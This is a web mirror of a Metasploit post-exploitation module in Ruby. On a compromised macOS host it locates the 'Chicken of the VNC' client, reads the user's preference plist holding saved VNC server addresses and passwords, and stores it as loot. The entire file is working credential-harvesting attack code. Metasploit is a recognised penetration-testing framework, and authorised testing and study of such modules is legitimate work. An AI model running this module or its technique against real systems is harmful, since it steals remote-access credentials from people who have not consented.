CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/post/osx/gather/enum_chicken_vnc_profile.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Post

7
  include Msf::Post::File

8


9
  def initialize(info = {})

10
    super(

11
      update_info(

12
        info,

13
        'Name' => 'OS X Gather Chicken of the VNC Profile',

14
        'Description' => %q{

15
          This module will download the "Chicken of the VNC" client application's

16
          profile file,	which is used to store other VNC servers' information such

17
          as the IP and password.

18
        },

19
        'License' => MSF_LICENSE,

20
        'Author' => [ 'sinn3r'],

21
        'Platform' => [ 'osx' ],

22
        'SessionTypes' => [ 'meterpreter', 'shell' ]

23
      )

24
    )

25
  end

26


27
  def whoami

28
    exec('/usr/bin/whoami')

29
  end

30


31
  #

32
  # This is just a wrapper for cmd_exec(), except it chomp() the output,

33
  # and retry under certain conditions.

34
  #

35
  def exec(cmd)

36
    tries = 0

37
    begin

38
      out = cmd_exec(cmd).chomp

39
    rescue ::Timeout::Error => e

40
      tries += 1

41
      if tries < 3

42
        vprint_error("#{@peer} - #{e.message} - retrying...")

43
        retry

44
      end

45
    rescue EOFError => e

46
      tries += 1

47
      if tries < 3

48
        vprint_error("#{@peer} - #{e.message} - retrying...")

49
        retry

50
      end

51
    end

52
  end

53


54
  def dir(path)

55
    subdirs = exec("ls -l #{path}")

56
    return [] if subdirs =~ /No such file or directory/

57


58
    items = subdirs.scan(/[A-Z][a-z][a-z]\x20+\d+\x20[\d:]+\x20(.+)$/).flatten

59
    return items

60
  end

61


62
  def locate_chicken

63
    dir('/Applications/').each do |folder|

64
      m = folder.match(/Chicken of the VNC\.app/)

65
      return true

66
    end

67


68
    return false

69
  end

70


71
  def get_profile_plist(user)

72
    f = exec("cat /Users/#{user}/Library/Preferences/com.geekspiff.chickenofthevnc.plist")

73
    if f =~ /No such file or directory/

74
      return nil

75
    else

76
      return f

77
    end

78
  end

79


80
  def save(file)

81
    p = store_loot(

82
      'chickenvnc.profile',

83
      'bin',

84
      session,

85
      file,

86
      'com.geekspiff.chickenofthevnc.plist'

87
    )

88


89
    print_good("#{@peer} - plist saved in #{p}")

90
  end

91


92
  def run

93
    @peer = "#{session.session_host}:#{session.session_port}"

94
    user = whoami

95


96
    if !locate_chicken

97
      print_error("#{@peer} - Chicken of the VNC is not installed")

98
      return

99
    else

100
      print_status("#{@peer} - Chicken of the VNC found")

101
    end

102


103
    plist = get_profile_plist(user)

104
    if plist.nil?

105
      print_error('No profile plist found')

106
    elsif !plist.nil?

107
      save(plist)

108
    end

109
  end

110
end

111


112